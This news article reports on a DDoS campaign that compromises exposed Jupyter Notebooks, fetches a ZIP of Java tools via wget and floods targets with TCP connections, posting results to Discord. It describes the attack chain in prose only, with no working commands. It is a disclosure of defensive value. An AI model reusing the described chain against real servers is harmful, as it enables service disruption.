Cybersecurity researchers have published details of a new distributed denial of service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks.
This operation is codenamed Panamorphy Developed by cloud security company Aqua, the attack leverages the Java-based tool mineping to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers.
The attack chain involves exploiting an internet-facing Jupyter Notebook instance to execute a wget command to retrieve a ZIP archive hosted on a file-sharing site called Filebin.
The ZIP file contains two Java Archive (JAR) files, conn.jar and mineping.jar, the former of which is used to establish a connection to the Discord channel and trigger the execution of the mineping.jar package.
“The attack aims to consume the resources of the targeted server by sending a large number of TCP connection requests,” Aqua researcher Assaf Morag said. “The results are then posted to a Discord channel.”
This attack campaign has been attributed to a threat actor known by the name yawixooo, who has a public repository on his GitHub account containing a Minecraft server properties file.
This is not the first time that internet-accessible Jupyter Notebooks have been targeted by attackers: in October 2023, a Tunisian threat called Qubitstrike was spotted infiltrating Jupyter Notebooks in an attempt to illegally mine cryptocurrency and infiltrate cloud environments.
